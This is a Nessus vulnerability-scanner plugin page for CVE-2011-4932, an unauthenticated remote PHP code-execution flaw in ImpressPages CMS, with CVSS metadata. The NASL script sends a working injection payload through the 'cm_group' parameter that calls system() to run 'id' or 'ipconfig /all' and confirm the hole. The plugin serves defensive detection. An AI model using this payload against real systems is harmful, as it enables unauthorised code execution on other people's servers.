Lucene search

K
nessusThis script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.IMPRESSPAGES_CM_GROUP_CODE_EXEC.NASL
HistoryFeb 19, 2013 - 12:00 a.m.

ImpressPages cm_group Parameter Remote PHP Code Execution

2013-02-1900:00:00
This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
12

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.132

Percentile

95.6%

The ImpressPages install hosted on the remote web server contains a flaw that allows arbitrary PHP code execution. Input passed to the β€˜cm_group’ parameter is not properly sanitized before being used in a PHP eval() function call. An unauthenticated, remote attacker can leverage this vulnerability to execute arbitrary PHP code on the remote host.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(64686);
  script_version("1.8");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2011-4932");
  script_bugtraq_id(49798);

  script_name(english:"ImpressPages cm_group Parameter Remote PHP Code Execution");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts an application that allows arbitrary code
execution.");
  script_set_attribute(attribute:"description", value:
"The ImpressPages install hosted on the remote web server contains a
flaw that allows arbitrary PHP code execution.  Input passed to the
'cm_group' parameter is not properly sanitized before being used in a
PHP eval() function call.  An unauthenticated, remote attacker can
leverage this vulnerability to execute arbitrary PHP code on the remote
host.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2012/Jan/28");
  script_set_attribute(attribute:"see_also", value:"http://www.impresspages.org/news/impresspages-1-0-13-security-release/");
  script_set_attribute(attribute:"solution", value:
"Upgrade to version 1.0.13 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2011/09/21");
  script_set_attribute(attribute:"patch_publication_date", value:"2011/09/21");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/02/19");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:impresspages:impresspages_cms");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("impresspages_detect.nasl", "os_fingerprint.nasl");
  script_require_keys("www/PHP", "www/impresspages");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");
include("data_protection.inc");

port = get_http_port(default:80, php:TRUE);

install = get_install_from_kb(
  appname      : "impresspages",
  port         : port,
  exit_on_fail : TRUE
);
dir = install["dir"];
install_url = build_url(qs:dir+'/', port:port);

# Determine which command to execute on target host
os = get_kb_item("Host/OS");
if (os && report_paranoia < 2)
{
  if ("Windows" >< os) cmd = 'ipconfig /all';
  else cmd = 'id';

  cmds = make_list(cmd);
}
else cmds = make_list('id', 'ipconfig /all');

cmd_pats = make_array();
cmd_pats['id'] = "uid=[0-9]+.*gid=[0-9]+.*";
cmd_pats['ipconfig /all'] = "Subnet Mask";

token = (SCRIPT_NAME - ".nasl") + "-" + unixtime() + ".txt";

foreach cmd (cmds)
{
  payload = "?cm_group=text_photos\title\Module();echo%20system('" + urlencode(str:cmd) + "');echo&cm_name=test";

  res = http_send_recv3(
    port         : port,
    method       : "GET",
    item         : dir + "/" + payload,
    exit_on_fail : TRUE
  );

  match = egrep(pattern:cmd_pats[cmd], string:res[2]);

  if (match)
  {
    # Format output for our report
    if (cmd == 'id')
    {
      body = match;
      body = strstr(body, '\n') - '\n';
    }
    else
    {
      body = res[2];
      index = stridx(body, "<br />");
      body = substr(body, 0, (index - 1));
    }

    snip = crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30);
    if (report_verbosity > 0)
    {
      report =
        '\n' + "Nessus was able execute the command '"+cmd+"' on the remote" +
        '\n' + "host using the following request :" +
        '\n' +
        '\n' + install_url + payload +
        '\n';
      if (report_verbosity > 1)
      {
        report +=
          '\n' + 'This produced the following output :' +
          '\n' +
          '\n' + snip +
          '\n' + data_protection::sanitize_uid(output:chomp(body)) +
          '\n' + snip +
          '\n';
      }
      security_hole(port:port, extra:report);
      exit(0);
    }
    else security_hole(port);
    exit(0);
  }
}
audit(AUDIT_WEB_APP_NOT_AFFECTED, "ImpressPages", install_url);
VendorProductVersionCPE
impresspagesimpresspages_cmscpe:/a:impresspages:impresspages_cms

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

EPSS

0.132

Percentile

95.6%

Related for IMPRESSPAGES_CM_GROUP_CODE_EXEC.NASL